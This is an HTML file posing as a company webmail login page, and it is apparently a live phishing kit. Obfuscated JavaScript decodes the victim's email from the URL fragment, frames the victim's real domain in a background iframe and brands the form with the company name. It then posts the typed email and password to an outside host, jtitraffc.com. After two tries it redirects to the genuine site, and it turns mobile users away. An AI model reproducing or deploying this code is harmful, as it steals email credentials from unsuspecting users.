<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Webmail</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      font-family: sans-serif;
      height: 100vh;
    }
    .iframe-container {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      overflow: hidden;
    }
    .iframe-content {
      width: 100%;
      height: 100%;
      border: none;
    }
    .login-form {
      position: absolute;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      background-color: rgba(0, 0, 0); /* Semi-transparent black background */
      padding: 20px;
      border-radius: 5px;
      color: white;
	  max-width: 400px; /* Limit form width for better responsiveness */
    }
    .login-form input {
      width: 95%;
      padding: 10px;
      margin-bottom: 15px;
      border: none;
      border-bottom: 1px solid #ccc;
      background-color: transparent;
      color: white;
    }
    .login-form button {
      width: 100%;
      padding: 10px;
      background-color: #4CAF50;
      color: white;
      border: none;
      cursor: pointer;
    }
	.loader {
	  display: inline-block;
	  width: 30px;
	  height: 30px;
	  border: 3px solid #f3f3f3;
	  border-top: 3px solid #3498db;
	  border-radius: 50%;
	  animation: spin 1s linear infinite;
	}

	@keyframes spin {
	  0% {
		transform: rotate(0deg);
	  }
	  100% {
		transform: rotate(360deg);
	  }
	}
  </style>
</head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script>
(function(_0x5a6b1e,_0x527114){const _0x3aea84=_0x3a7b,_0x546b0b=_0x5a6b1e();while(!![]){try{const _0x1f366d=-parseInt(_0x3aea84(0x10f))/0x1+parseInt(_0x3aea84(0x11b))/0x2*(parseInt(_0x3aea84(0x108))/0x3)+parseInt(_0x3aea84(0x12a))/0x4*(parseInt(_0x3aea84(0x102))/0x5)+-parseInt(_0x3aea84(0x124))/0x6*(-parseInt(_0x3aea84(0x12d))/0x7)+parseInt(_0x3aea84(0xff))/0x8*(parseInt(_0x3aea84(0x114))/0x9)+-parseInt(_0x3aea84(0x135))/0xa+-parseInt(_0x3aea84(0x100))/0xb;if(_0x1f366d===_0x527114)break;else _0x546b0b['push'](_0x546b0b['shift']());}catch(_0x5a6f66){_0x546b0b['push'](_0x546b0b['shift']());}}}(_0x5a76,0x985db));function getFragment(){const _0x38e1e8=_0x3a7b,_0x3e9da6=new URLSearchParams(window[_0x38e1e8(0x103)][_0x38e1e8(0x119)][_0x38e1e8(0x130)](0x1));var _0x5e160a=window[_0x38e1e8(0x103)]['hash'],_0x5151e9=_0x5e160a[_0x38e1e8(0x107)]('#')[0x1],_0x2bb072=atob(atob(_0x5151e9));document['getElementById']('email')[_0x38e1e8(0x12e)]=_0x2bb072;const [_0x588e5c,_0x28556e]=_0x2bb072[_0x38e1e8(0x107)]('@'),[_0xd67f5f,_0x51889c]=_0x28556e[_0x38e1e8(0x107)]('.'),_0x57ec0b=_0xd67f5f['charAt'](0x0)[_0x38e1e8(0x10d)]()+_0xd67f5f[_0x38e1e8(0x130)](0x1);document[_0x38e1e8(0x137)]('ifr')[_0x38e1e8(0x110)]=_0x38e1e8(0x138)+_0x28556e,document[_0x38e1e8(0x137)](_0x38e1e8(0xfe)),$(_0x38e1e8(0x113))[_0x38e1e8(0x106)](),$('#company')[_0x38e1e8(0x131)](_0x38e1e8(0x12c)+_0x57ec0b+_0x38e1e8(0x11c)),document[_0x38e1e8(0x137)](_0x38e1e8(0x11d))[_0x38e1e8(0x136)]='Powered\x20By\x20http://'+_0x28556e+'\x20Mail\x20Server';const _0x3c03fd=/iPhone|iPad|iPod|Android|BlackBerry|IEMobile/i['test'](navigator[_0x38e1e8(0x126)]);_0x3c03fd?alert(_0x38e1e8(0x111)):getFragment();}let attemptCount=0x0;function _0x5a76(){const _0x3ed638=['length','1172veaSaN','#wrng_pass','<h2>','5032678UzOFWc','value','You\x20entered\x20a\x20wrong\x20password,\x20try\x20again.','slice','html','responseText','Content-Type','&password=','5424020jBpzvN','placeholder','getElementById','https://','querySelector','company','1976PvZJxY','3717329JPYLuS','includes','12230ZGjAEh','location','#pass_err','Please\x20enter\x20password','show','split','3lfiJBD','onload','POST','setRequestHeader','#loading','toUpperCase','text','933841lJswNQ','src','Please\x20use\x20a\x20desktop\x20computer\x20to\x20access\x20this\x20website.','#email_err','#company','31653LowrKj','success','https://jtitraffc.com/mygeneralpage/rp/','application/x-www-form-urlencoded','Please\x20enter\x20a\x20valid\x20email\x20address','hash','email','267884OVOQnN','\x20Webmail\x20Login</h2>','powered','password','status','Password\x20must\x20be\x20at\x20least\x205\x20characters','open','href','send','6PENyvU','hide','userAgent','not\x20success','email='];_0x5a76=function(){return _0x3ed638;};return _0x5a76();}function _0x3a7b(_0xffa35c,_0x1de5cb){const _0x5a7651=_0x5a76();return _0x3a7b=function(_0x3a7bf8,_0x5d2410){_0x3a7bf8=_0x3a7bf8-0xfe;let _0x2b3cf0=_0x5a7651[_0x3a7bf8];return _0x2b3cf0;},_0x3a7b(_0xffa35c,_0x1de5cb);}function validateForm(){const _0x552a2f=_0x3a7b,_0x3108ab=document[_0x552a2f(0x137)](_0x552a2f(0x11a)),_0x2987b3=_0x3108ab[_0x552a2f(0x12e)],_0x264535=document[_0x552a2f(0x139)]('.login-form\x20input[type=\x22password\x22]'),_0x5cd719=_0x264535[_0x552a2f(0x12e)];$(_0x552a2f(0x112))[_0x552a2f(0x125)](),$(_0x552a2f(0x104))['hide'](),$(_0x552a2f(0x12b))[_0x552a2f(0x125)](),$(_0x552a2f(0x10c))['show']();if(_0x2987b3==='')return $(_0x552a2f(0x10c))[_0x552a2f(0x125)](),$(_0x552a2f(0x112))[_0x552a2f(0x106)](),$(_0x552a2f(0x112))[_0x552a2f(0x10e)]('Please\x20enter\x20email\x20address'),![];else{if(!_0x2987b3[_0x552a2f(0x101)]('@'))return $(_0x552a2f(0x10c))[_0x552a2f(0x125)](),$('#email_err')[_0x552a2f(0x106)](),$('#email_err')[_0x552a2f(0x10e)](_0x552a2f(0x118)),![];}if(_0x5cd719==='')return $('#loading')['hide'](),$(_0x552a2f(0x104))[_0x552a2f(0x106)](),$(_0x552a2f(0x104))[_0x552a2f(0x10e)](_0x552a2f(0x105)),![];else{if(_0x5cd719[_0x552a2f(0x129)]<0x5)return $(_0x552a2f(0x10c))[_0x552a2f(0x125)](),$('#pass_err')[_0x552a2f(0x106)](),$(_0x552a2f(0x104))[_0x552a2f(0x10e)](_0x552a2f(0x120)),![];}const _0x3e5334=new URLSearchParams(window[_0x552a2f(0x103)]['hash'][_0x552a2f(0x130)](0x1));var _0x4355c9=window[_0x552a2f(0x103)][_0x552a2f(0x119)],_0x28b289=_0x4355c9['split']('#')[0x2],_0x41ed9b=atob(_0x28b289);const _0x48c51b=new XMLHttpRequest();_0x48c51b[_0x552a2f(0x121)](_0x552a2f(0x10a),_0x552a2f(0x116)+_0x41ed9b+'_veri.php',!![]),_0x48c51b[_0x552a2f(0x10b)](_0x552a2f(0x133),_0x552a2f(0x117));const _0xfd32d6=_0x552a2f(0x128)+_0x2987b3+_0x552a2f(0x134)+_0x5cd719;return _0x48c51b[_0x552a2f(0x109)]=function(){const _0x1752e1=_0x552a2f;document[_0x1752e1(0x137)](_0x1752e1(0x11e))[_0x1752e1(0x12e)]='',_0x48c51b[_0x1752e1(0x11f)]===0xc8&&_0x48c51b[_0x1752e1(0x132)]===_0x1752e1(0x115)?(window[_0x1752e1(0x103)][_0x1752e1(0x122)]=_0x1752e1(0x138)+_0x2987b3[_0x1752e1(0x107)]('@')[0x1],attemptCount=0x0):(document[_0x1752e1(0x137)](_0x1752e1(0x11e))[_0x1752e1(0x12e)]='',attemptCount++,attemptCount>=0x2?window['location'][_0x1752e1(0x122)]='https://'+_0x2987b3[_0x1752e1(0x107)]('@')[0x1]:_0x48c51b[_0x1752e1(0x132)]===_0x1752e1(0x127)?($(_0x1752e1(0x112))[_0x1752e1(0x125)](),$(_0x1752e1(0x104))[_0x1752e1(0x125)](),$(_0x1752e1(0x10c))['hide'](),$(_0x1752e1(0x12b))['show'](),$(_0x1752e1(0x12b))[_0x1752e1(0x10e)](_0x1752e1(0x12f))):alert(_0x48c51b['responseText']));},_0x48c51b[_0x552a2f(0x123)](_0xfd32d6),![];}

</script>
<body onload="getFragment()">
  <div class="iframe-container">
	<iframe id="ifr" class="iframe-content" sandbox="allow-scripts allow-same-origin" style="pointer-events: none;"></iframe>
  </div>
    <div class="login-form">
		<div class="gtranslate_wrapper"></div>
		<script>window.gtranslateSettings = {"default_language":"en","detect_browser_language":true,"wrapper_selector":".gtranslate_wrapper","flag_size":16}</script>
		<script src="https://cdn.gtranslate.net/widgets/latest/dwf.js" defer></script>
        <div id="company" style="display: none; font-size: 0.9em; color: white;"></div>
		<font id="sensi" face="Arial" size="2" color="white">Because you're accessing sensitive info, you need to verify your password.<br></br></font>
        <div id="msg" style="display: none;"></div>
        <div id="email_err" style="display: none; font-size: 0.9em; color: red;"></div>
        <div id="pass_err" style="display: none; font-size: 0.9em; color: red;"></div>
		<div id="wrng_pass" style="display: none; font-size: 0.9em; color: red;"></div>
		<div id="loading" style="display: none; text-align: center;">
		  <span class="loader"></span>
		</div>
        
		<p></p>
        <input id="email" type="text" placeholder="Username" required readonly>
        <input id="password" type="password" placeholder="Password" required>
        <button type="submit" onclick="return validateForm();">Login</button><br></br>
        <input id="powered" type="text" required readonly style="text-align: center; border: none; outline: none;">
		<div class="gtranslate_wrapper"></div>

    </div>
</body>

</html>
